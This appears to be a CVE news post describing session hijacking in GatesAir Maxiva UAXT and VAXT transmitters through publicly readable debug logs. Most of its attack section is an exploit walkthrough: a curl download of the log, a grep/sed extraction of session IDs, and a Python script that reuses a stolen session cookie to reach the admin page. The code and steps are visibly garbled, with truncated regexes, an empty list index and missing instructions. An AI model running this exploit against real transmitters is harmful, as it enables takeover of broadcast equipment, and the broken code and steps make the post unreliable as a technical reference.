CVE CyberSecurity Database News

CVE-2025-22960 - Session Hijacking in GatesAir Maxiva UAXT, VAXT Transmitters via Exposed Log Files

Poster -

CVE ID: CVE-2025-22960
Affected Products: GatesAir Maxiva UAXT, VAXT series transmitters
Severity: High
Authoritative Source: gatesair.com

TL;DR

A serious security vulnerability (CVE-2025-22960) has been found in the web management interface of GatesAir Maxiva UAXT and VAXT transmitters. Hackers can access open log files without logging in. These logs can leak session IDs and authentication tokens, putting the device at risk for session hijacking and privilege escalation. Read on for an easy-to-understand deep dive, attack details, and code snippets showing how attackers can exploit this bug.

What’s the Bug?

When you log into the web interface of an affected transmitter, the device keeps logs under /logs/debug/xteLog*. The big problem? These logs are publicly accessible—there’s no login required! If a baddie knows the right URL, they can read sensitive information from these logs.

Original Reference

- SSD Disclosure: GatesAir Maxiva UAXT VAXT session hijacking
- NVD Entry for CVE-2025-22960

Let’s break down the attack steps in simple terms

1. The hacker visits http://DEVICE-IP/logs/debug/xteLog2024-01-01.log (or any similar log file).

The attacker extracts the sess_id.

Now, the attacker uses this session ID as their own, by injecting it into their browser session (via cookies), and becomes the authenticated admin!

Step 1: Download the Log File

curl http://DEVICE-IP/logs/debug/xteLog2024-01-01.log

Example Log Output

2024-06-01T12:34:56 user_check_password OK, sess_id=ABC123DEF456
2024-06-01T12:35:00 user_logout, sess_id=ZYX987WV654

An attacker can quickly grab it using command-line tools

grep 'user_check_password OK' xteLog2024-01-01.log | \
  sed -n 's/.*sess_id=\([A-Za-z-9]*\).*/\1/p'

This returns something like

ABC123DEF456

For Chrome with “EditThisCookie” Extension

- Install the EditThisCookie extension.

Refresh the page.

Result: You’re in as the victim user—no password required!

Visual Code Example (Python Script)

Below is a simple Python script to automate this attack (for *educational demo only*—don’t hack real devices!).

import requests
import re

DEVICE_IP = "192.168.1.100"
log_url = f"http://{DEVICE_IP}/logs/debug/xteLog2024-01-01.log";

# Step 1: Get the log
resp = requests.get(log_url)
if resp.status_code != 200:
    print("Could not download log file")
    exit()

# Step 2: Search for session ID
matches = re.findall(r'user_check_password OK, sess_id=([A-Za-z-9]+)', resp.text)
if not matches:
    print("No session IDs found")
    exit()

sess_id = matches[]
print("Found session ID:", sess_id)

# Step 3: Use the stolen session ID to access admin page
cookies = {'sess_id': sess_id}
admin_page = f"http://{DEVICE_IP}/web-admin-page";
admin_resp = requests.get(admin_page, cookies=cookies)
print("Access granted:", "Admin" in admin_resp.text)

Why Is This Dangerous?

- No login needed: Anyone on the network (or who finds an internet-exposed device) can grab log files and take over active sessions.
- Privilege escalation: Attackers can act as admin, change configs, and even crash or damage the transmitter.

What Should You Do?

1. Restrict access: Block internet/public access to /logs/ or the whole device.

Final Thoughts

CVE-2025-22960 is an alarming example of how simple oversights—like forgetting to secure log files—can have a big impact. If you use GatesAir Maxiva UAXT or VAXT transmitters, lock them down now.

For more technical details and updates, check the official SSD Disclosure and the NVD entry.

Stay safe!

*Note: This post is for educational and defensive use only. Never exploit vulnerabilities without permission!*

Timeline

Published on: 02/13/2025 23:15:10 UTC
Last modified on: 03/17/2025 19:15:25 UTC